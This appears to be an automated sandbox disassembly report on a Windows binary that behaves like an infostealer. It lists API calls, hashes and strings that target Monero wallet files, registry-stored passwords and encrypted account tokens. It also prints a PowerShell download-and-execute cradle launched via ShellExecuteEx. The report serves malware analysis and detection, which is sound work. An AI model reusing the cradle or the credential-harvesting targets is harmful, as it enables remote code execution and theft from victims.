                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                              • String ID:
                              • API String ID: 3541710228-0
                              • Opcode ID: 40e8fb3d46bcf40f0701cc18d26b1946a9fc329bff02fe1864e4f156cbe9a3c5
                              • Instruction ID: 120390a5c39ae6c9f732a0808257e9021f4d52ed40c14a55ce33432cd1426546
                              • Opcode Fuzzy Hash: 40e8fb3d46bcf40f0701cc18d26b1946a9fc329bff02fe1864e4f156cbe9a3c5
                              • Instruction Fuzzy Hash: A27173B6900208ABCB15EBA0DC99FEE777DAF98304F00459CF60997181EB75DB45CBA1
                              APIs
                                • Part of subcall function 001B12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 001B12B4
                                • Part of subcall function 001B12A0: RtlAllocateHeap.NTDLL(00000000), ref: 001B12BB
                                • Part of subcall function 001B12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 001B12D7
                                • Part of subcall function 001B12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 001B12F5
                                • Part of subcall function 001B12A0: RegCloseKey.ADVAPI32(?), ref: 001B12FF
                              • lstrcat.KERNEL32(?,00000000), ref: 001B134F
                              • lstrlen.KERNEL32(?), ref: 001B135C
                              • lstrcat.KERNEL32(?,.keys), ref: 001B1377
                                • Part of subcall function 001CA740: lstrcpy.KERNEL32(001D0E17,00000000), ref: 001CA788
                                • Part of subcall function 001CA9B0: lstrlen.KERNEL32(?,00EE87F8,?,\Monero\wallet.keys,001D0E17), ref: 001CA9C5
                                • Part of subcall function 001CA9B0: lstrcpy.KERNEL32(00000000), ref: 001CAA04
                                • Part of subcall function 001CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001CAA12
                                • Part of subcall function 001CA8A0: lstrcpy.KERNEL32(?,001D0E17), ref: 001CA905
                                • Part of subcall function 001C8B60: GetSystemTime.KERNEL32(001D0E1A,00EE99A0,001D05AE,?,?,001B13F9,?,0000001A,001D0E1A,00000000,?,00EE87F8,?,\Monero\wallet.keys,001D0E17), ref: 001C8B86
                                • Part of subcall function 001CA920: lstrcpy.KERNEL32(00000000,?), ref: 001CA972
                                • Part of subcall function 001CA920: lstrcat.KERNEL32(00000000), ref: 001CA982
                              • CopyFileA.KERNEL32(?,00000000,00000001), ref: 001B1465
                                • Part of subcall function 001CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001CA7E6
                                • Part of subcall function 001B99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001B99EC
                                • Part of subcall function 001B99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 001B9A11
                                • Part of subcall function 001B99C0: LocalAlloc.KERNEL32(00000040,?), ref: 001B9A31
                                • Part of subcall function 001B99C0: ReadFile.KERNEL32(000000FF,?,00000000,001B148F,00000000), ref: 001B9A5A
                                • Part of subcall function 001B99C0: LocalFree.KERNEL32(001B148F), ref: 001B9A90
                                • Part of subcall function 001B99C0: CloseHandle.KERNEL32(000000FF), ref: 001B9A9A
                              • DeleteFileA.KERNEL32(00000000), ref: 001B14EF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                              • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                              • API String ID: 3478931302-218353709
                              • Opcode ID: e4d0fe7181e61d5e932bb68b854bbedf75d14b09885039576e61a816b4d86926
                              • Instruction ID: 27a841c5b72ebfc0b3222687fadd4b5f2602f69680d687ccf2ba526a18fb9d75
                              • Opcode Fuzzy Hash: e4d0fe7181e61d5e932bb68b854bbedf75d14b09885039576e61a816b4d86926
                              • Instruction Fuzzy Hash: 7A5111B195011957CB16EB60DD96FED733CAF74305F80419CB60AA2081EF30AB89CAA6
                              APIs
                                • Part of subcall function 001B72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 001B733A
                                • Part of subcall function 001B72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 001B73B1
                                • Part of subcall function 001B72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 001B740D
                                • Part of subcall function 001B72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 001B7452
                                • Part of subcall function 001B72D0: HeapFree.KERNEL32(00000000), ref: 001B7459
                              • lstrcat.KERNEL32(00000000,001D17FC), ref: 001B7606
                              • lstrcat.KERNEL32(00000000,00000000), ref: 001B7648
                              • lstrcat.KERNEL32(00000000, : ), ref: 001B765A
                              • lstrcat.KERNEL32(00000000,00000000), ref: 001B768F
                              • lstrcat.KERNEL32(00000000,001D1804), ref: 001B76A0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 001B76D3
                              • lstrcat.KERNEL32(00000000,001D1808), ref: 001B76ED
                              • task.LIBCPMTD ref: 001B76FB
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                              • String ID: :
                              • API String ID: 2677904052-3653984579
                              • Opcode ID: 519564d3e321d12d54fd4f0998ed70695587170dc4e91361be1b02f0a43fbdf2
                              • Instruction ID: af4f5705d73433acc15fd457a23077cc32ec36c838f4e97ec22d2e3fbfba719a
                              • Opcode Fuzzy Hash: 519564d3e321d12d54fd4f0998ed70695587170dc4e91361be1b02f0a43fbdf2
                              • Instruction Fuzzy Hash: EC314CB2901509EFCB09EBB8DC95DFE777CBB54302F144118F106AB291DB34A946CB52
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00EEDCA8,00000000,?,001D0E2C,00000000,?,00000000), ref: 001C8130
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001C8137
                              • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 001C8158
                              • __aulldiv.LIBCMT ref: 001C8172
                              • __aulldiv.LIBCMT ref: 001C8180
                              • wsprintfA.USER32 ref: 001C81AC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                              • String ID: %d MB$@
                              • API String ID: 2774356765-3474575989
                              • Opcode ID: e226ab64b30691003ec3b714a1a9853e1eb8577be634c41de5997c316c24abf0
                              • Instruction ID: 7c289a3e6b03bbb279d36ecce83e1cc56f0e6a5878e7e51d80e415580d811be1
                              • Opcode Fuzzy Hash: e226ab64b30691003ec3b714a1a9853e1eb8577be634c41de5997c316c24abf0
                              • Instruction Fuzzy Hash: 65214DB1E44208ABDB00DFD4DC49FAEB7B8FB54B10F104219F605BB280D778A9018BA5
                              APIs
                                • Part of subcall function 001CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001CA7E6
                                • Part of subcall function 001B47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 001B4839
                                • Part of subcall function 001B47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 001B4849
                              • InternetOpenA.WININET(001D0DF7,00000001,00000000,00000000,00000000), ref: 001B610F
                              • StrCmpCA.SHLWAPI(?,00EEE498), ref: 001B6147
                              • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 001B618F
                              • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 001B61B3
                              • InternetReadFile.WININET(?,?,00000400,?), ref: 001B61DC
                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 001B620A
                              • CloseHandle.KERNEL32(?,?,00000400), ref: 001B6249
                              • InternetCloseHandle.WININET(?), ref: 001B6253
                              • InternetCloseHandle.WININET(00000000), ref: 001B6260
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                              • String ID:
                              • API String ID: 2507841554-0
                              • Opcode ID: 40ec34561c92e20a66a564ac16f8fa584fa0c4e5a3749a649d09f90bca28b9b4
                              • Instruction ID: b61ed7d8c2bd8058db42dd87bef943314d86c69edc4476fbb3610d1f8f288118
                              • Opcode Fuzzy Hash: 40ec34561c92e20a66a564ac16f8fa584fa0c4e5a3749a649d09f90bca28b9b4
                              • Instruction Fuzzy Hash: 3D515DB1900218ABEB20DF90DC45FEE77B8EB54705F108098E609A7181DB78AA89CF95
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 001B733A
                              • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 001B73B1
                              • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 001B740D
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 001B7452
                              • HeapFree.KERNEL32(00000000), ref: 001B7459
                              • task.LIBCPMTD ref: 001B7555
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$EnumFreeOpenProcessValuetask
                              • String ID: Password
                              • API String ID: 775622407-3434357891
                              • Opcode ID: 309818f0c0db06d5db9b5a4a4c1d05736b5a9a57d8244c35cef840ad3c2ee11e
                              • Instruction ID: 98becd3532a745a116274634cfe27636206a989ec54e89d8b5d1684a6ea9095a
                              • Opcode Fuzzy Hash: 309818f0c0db06d5db9b5a4a4c1d05736b5a9a57d8244c35cef840ad3c2ee11e
                              • Instruction Fuzzy Hash: 03611BB59041589BDB24DF50CC45BE9B7BCBF58340F0081E9E649A6281DBB06BC9CFA1
                              APIs
                                • Part of subcall function 001CA740: lstrcpy.KERNEL32(001D0E17,00000000), ref: 001CA788
                                • Part of subcall function 001CA9B0: lstrlen.KERNEL32(?,00EE87F8,?,\Monero\wallet.keys,001D0E17), ref: 001CA9C5
                                • Part of subcall function 001CA9B0: lstrcpy.KERNEL32(00000000), ref: 001CAA04
                                • Part of subcall function 001CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001CAA12
                                • Part of subcall function 001CA920: lstrcpy.KERNEL32(00000000,?), ref: 001CA972
                                • Part of subcall function 001CA920: lstrcat.KERNEL32(00000000), ref: 001CA982
                                • Part of subcall function 001CA8A0: lstrcpy.KERNEL32(?,001D0E17), ref: 001CA905
                                • Part of subcall function 001CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001CA7E6
                              • lstrlen.KERNEL32(00000000), ref: 001BBC9F
                                • Part of subcall function 001C8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 001C8E52
                              • StrStrA.SHLWAPI(00000000,AccountId), ref: 001BBCCD
                              • lstrlen.KERNEL32(00000000), ref: 001BBDA5
                              • lstrlen.KERNEL32(00000000), ref: 001BBDB9
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                              • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                              • API String ID: 3073930149-1079375795
                              • Opcode ID: 0abb7b0ec0cfe1f6edb0658a61131871c7944ad78ab2a1a8e0280bca8f782891
                              • Instruction ID: a33502cfc2699c4fa348f3c3fb81ebbe44c42d166cdb8c582492d42e78b4d6d3
                              • Opcode Fuzzy Hash: 0abb7b0ec0cfe1f6edb0658a61131871c7944ad78ab2a1a8e0280bca8f782891
                              • Instruction Fuzzy Hash: 5AB11171910108ABDB15FBA0DD96FEE733CAF74309F80415DF506A6191EF34AA49CBA2
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess$DefaultLangUser
                              • String ID: *
                              • API String ID: 1494266314-163128923
                              • Opcode ID: 52e6c4bfd3613e51eb0dcc4fc8ca441011baf98fce3d250b771b5e705f6710fc
                              • Instruction ID: 935c4a1839a20738aaf154d1b24657a5a1e57db135b761129ceb5bee7ee42ecb
                              • Opcode Fuzzy Hash: 52e6c4bfd3613e51eb0dcc4fc8ca441011baf98fce3d250b771b5e705f6710fc
                              • Instruction Fuzzy Hash: 81F05E71904209EFD345AFE0E909F3C7B78FB05703F140198E61D86290D6709B41DBD6
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 001B4FCA
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001B4FD1
                              • InternetOpenA.WININET(001D0DDF,00000000,00000000,00000000,00000000), ref: 001B4FEA
                              • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 001B5011
                              • InternetReadFile.WININET(?,?,00000400,00000000), ref: 001B5041
                              • InternetCloseHandle.WININET(?), ref: 001B50B9
                              • InternetCloseHandle.WININET(?), ref: 001B50C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                              • String ID:
                              • API String ID: 3066467675-0
                              • Opcode ID: 8a43f43c59ed5616a03a623de5107c450fb85e86fc01257cf246deb9a42ebced
                              • Instruction ID: 4b06f816c6dcab4ce3ab38d9f84e7bf407155a6556fd6b25c24e4260b538ad97
                              • Opcode Fuzzy Hash: 8a43f43c59ed5616a03a623de5107c450fb85e86fc01257cf246deb9a42ebced
                              • Instruction Fuzzy Hash: 333108F4A00218ABDB20DF94DC85BDCB7B9EB48704F5081D9F609A7280D7706AC5CF99
                              APIs
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 001C8426
                              • wsprintfA.USER32 ref: 001C8459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 001C847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 001C848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 001C8499
                                • Part of subcall function 001CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001CA7E6
                              • RegQueryValueExA.ADVAPI32(00000000,00EEDB28,00000000,000F003F,?,00000400), ref: 001C84EC
                              • lstrlen.KERNEL32(?), ref: 001C8501
                              • RegQueryValueExA.ADVAPI32(00000000,00EEDD20,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,001D0B34), ref: 001C8599
                              • RegCloseKey.ADVAPI32(00000000), ref: 001C8608
                              • RegCloseKey.ADVAPI32(00000000), ref: 001C861A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                              • String ID: %s\%s
                              • API String ID: 3896182533-4073750446
                              • Opcode ID: 943ff8b94d1dbe444602662a3711e1b6181c993030d9acf52ece038364526d3c
                              • Instruction ID: acc446010675e6697ed19a8536121e02ae46d76bae510cf9e214c28a385863bd
                              • Opcode Fuzzy Hash: 943ff8b94d1dbe444602662a3711e1b6181c993030d9acf52ece038364526d3c
                              • Instruction Fuzzy Hash: A521C9B195022CABDB24DB54DC85FE9B7B8FB48704F00C5D9E609A6240DF71AA85CFD4
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001C76A4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001C76AB
                              • RegOpenKeyExA.ADVAPI32(80000002,00EDB9F8,00000000,00020119,00000000), ref: 001C76DD
                              • RegQueryValueExA.ADVAPI32(00000000,00EEDC18,00000000,00000000,?,000000FF), ref: 001C76FE
                              • RegCloseKey.ADVAPI32(00000000), ref: 001C7708
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: Windows 11
                              • API String ID: 3225020163-2517555085
                              • Opcode ID: 4c64fd4946dcd9edc2197e7897b5c47813c740e20ee2048317d3936e350741a7
                              • Instruction ID: 949219cf257a5d413ab94de94ad67e909ad09266a017515c7da6a536f0577bcd
                              • Opcode Fuzzy Hash: 4c64fd4946dcd9edc2197e7897b5c47813c740e20ee2048317d3936e350741a7
                              • Instruction Fuzzy Hash: A0011AB5A04708ABE701EBE4DD49F79B7BCEB48701F104059FA0896290D7B0A904CB51
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001C7734
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001C773B
                              • RegOpenKeyExA.ADVAPI32(80000002,00EDB9F8,00000000,00020119,001C76B9), ref: 001C775B
                              • RegQueryValueExA.ADVAPI32(001C76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 001C777A
                              • RegCloseKey.ADVAPI32(001C76B9), ref: 001C7784
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: CurrentBuildNumber
                              • API String ID: 3225020163-1022791448
                              • Opcode ID: 35ea929b35d41f9af50a55180a232db7e2128a93126e5869c3b5b58ab09ea134
                              • Instruction ID: 030b91247b12bb50d92729a17e11f1f004ff050033334fd1bdd517a1411f0bf9
                              • Opcode Fuzzy Hash: 35ea929b35d41f9af50a55180a232db7e2128a93126e5869c3b5b58ab09ea134
                              • Instruction Fuzzy Hash: 7C01DEF5A40208BBD701DBE4DC49FBEB7BCEB48705F104559FA09A7281D6B0A544CB51
                              APIs
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001B99EC
                              • GetFileSizeEx.KERNEL32(000000FF,?), ref: 001B9A11
                              • LocalAlloc.KERNEL32(00000040,?), ref: 001B9A31
                              • ReadFile.KERNEL32(000000FF,?,00000000,001B148F,00000000), ref: 001B9A5A
                              • LocalFree.KERNEL32(001B148F), ref: 001B9A90
                              • CloseHandle.KERNEL32(000000FF), ref: 001B9A9A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                              • String ID:
                              • API String ID: 2311089104-0
                              • Opcode ID: 53dc07de54b9a5accb011eb7c04d40116926a9f215006713598c52ab4277ffdf
                              • Instruction ID: 4e0d799dd4a87baa7df1f1441025a0d35caa64247e662fd109c9befda34e5c72
                              • Opcode Fuzzy Hash: 53dc07de54b9a5accb011eb7c04d40116926a9f215006713598c52ab4277ffdf
                              • Instruction Fuzzy Hash: 58310AB4A00209EFDB14DFA4C985FEE77B9FF48740F108158E915A7290D778A942CFA1
                              APIs
                              • lstrcat.KERNEL32(?,00EEDEE8), ref: 001C47DB
                                • Part of subcall function 001C8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 001C8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 001C4801
                              • lstrcat.KERNEL32(?,?), ref: 001C4820
                              • lstrcat.KERNEL32(?,?), ref: 001C4834
                              • lstrcat.KERNEL32(?,00EDB058), ref: 001C4847
                              • lstrcat.KERNEL32(?,?), ref: 001C485B
                              • lstrcat.KERNEL32(?,00EED600), ref: 001C486F
                                • Part of subcall function 001CA740: lstrcpy.KERNEL32(001D0E17,00000000), ref: 001CA788
                                • Part of subcall function 001C8D90: GetFileAttributesA.KERNEL32(00000000,?,001B1B54,?,?,001D564C,?,?,001D0E1F), ref: 001C8D9F
                                • Part of subcall function 001C4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 001C4580
                                • Part of subcall function 001C4570: RtlAllocateHeap.NTDLL(00000000), ref: 001C4587
                                • Part of subcall function 001C4570: wsprintfA.USER32 ref: 001C45A6
                                • Part of subcall function 001C4570: FindFirstFileA.KERNEL32(?,?), ref: 001C45BD
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                              • String ID:
                              • API String ID: 2540262943-0
                              • Opcode ID: a952b4ecd9f41e86bc6a2aab4500bdf4a23265db83ced99b3d48f098da27c792
                              • Instruction ID: a3c089fdd7471fb47c2526a574ab3c3730f1dbc27c340b37aad5f74cab8defcc
                              • Opcode Fuzzy Hash: a952b4ecd9f41e86bc6a2aab4500bdf4a23265db83ced99b3d48f098da27c792
                              • Instruction Fuzzy Hash: D2315DB2900218A7CB11FBA0DC85FE9737CAB68704F404589B35996081EFB5E689CB96
                              APIs
                                • Part of subcall function 001CA740: lstrcpy.KERNEL32(001D0E17,00000000), ref: 001CA788
                                • Part of subcall function 001CA9B0: lstrlen.KERNEL32(?,00EE87F8,?,\Monero\wallet.keys,001D0E17), ref: 001CA9C5
                                • Part of subcall function 001CA9B0: lstrcpy.KERNEL32(00000000), ref: 001CAA04
                                • Part of subcall function 001CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001CAA12
                                • Part of subcall function 001CA920: lstrcpy.KERNEL32(00000000,?), ref: 001CA972
                                • Part of subcall function 001CA920: lstrcat.KERNEL32(00000000), ref: 001CA982
                                • Part of subcall function 001CA8A0: lstrcpy.KERNEL32(?,001D0E17), ref: 001CA905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 001C2D85
                              Strings
                              • ')", xrefs: 001C2CB3
                              • <, xrefs: 001C2D39
                              • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 001C2CC4
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 001C2D04
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                              • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              • API String ID: 3031569214-898575020
                              • Opcode ID: 271e1ef33b1c43592d022a61782e840882acfac80469707df69980ee3c104d51
                              • Instruction ID: b8da3986185bc24e79267d1716d631d82aee9453c91c08ed8213440454f8681a
                              • Opcode Fuzzy Hash: 271e1ef33b1c43592d022a61782e840882acfac80469707df69980ee3c104d51
                              • Instruction Fuzzy Hash: F941CD71C5020C9BDB16EBA0D896FEDB774AF34304F90411DE016A7191DF74AA4ACF96
                              APIs
                              • LocalAlloc.KERNEL32(00000040,?), ref: 001B9F41
                                • Part of subcall function 001CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001CA7E6
                                • Part of subcall function 001CA740: lstrcpy.KERNEL32(001D0E17,00000000), ref: 001CA788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$AllocLocal
                              • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                              • API String ID: 4171519190-1096346117
                              • Opcode ID: 27d7ce1743e0508c17d7d3af52925e3cddde56bc6d83f79893c1fb030f7f74f8
                              • Instruction ID: 10ecf4c854899382462334c0decebf325e4ef1d3a8777498936fb047d39a9b1b
                              • Opcode Fuzzy Hash: 27d7ce1743e0508c17d7d3af52925e3cddde56bc6d83f79893c1fb030f7f74f8
                              • Instruction Fuzzy Hash: 0261207190024CEBDB25EFA4CC96FED7775AF65304F808118F90A9F191DB74AA06CB52
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,00EED460,00000000,00020119,?), ref: 001C40F4
                              • RegQueryValueExA.ADVAPI32(?,00EEDF78,00000000,00000000,00000000,000000FF), ref: 001C4118
                              • RegCloseKey.ADVAPI32(?), ref: 001C4122
                              • lstrcat.KERNEL32(?,00000000), ref: 001C4147
                              • lstrcat.KERNEL32(?,00EEDDE0), ref: 001C415B
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                               • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$CloseOpenQueryValue
                              • String ID:
                              • API String ID: 690832082-0
                              • Opcode ID: 17970ad474612e9265858fd9dd2d1ffdf1e07aaf96258f3349f72df0b4ca83f4
                              • Instruction ID: be5018aac9d3436d8c57e1e858fa0e850b6e7ee67535328966f7688847c1b58b
                              • Opcode Fuzzy Hash: 17970ad474612e9265858fd9dd2d1ffdf1e07aaf96258f3349f72df0b4ca83f4
                              • Instruction Fuzzy Hash: 3C41EBB6D001086BDB25EBA0DC56FFE773DAB98300F40855CB61957181EB759B88CBE2
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001C7E37
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001C7E3E
                              • RegOpenKeyExA.ADVAPI32(80000002,00EDB838,00000000,00020119,?), ref: 001C7E5E
                              • RegQueryValueExA.ADVAPI32(?,00EED440,00000000,00000000,000000FF,000000FF), ref: 001C7E7F
                              • RegCloseKey.ADVAPI32(?), ref: 001C7E92
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                               • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmp
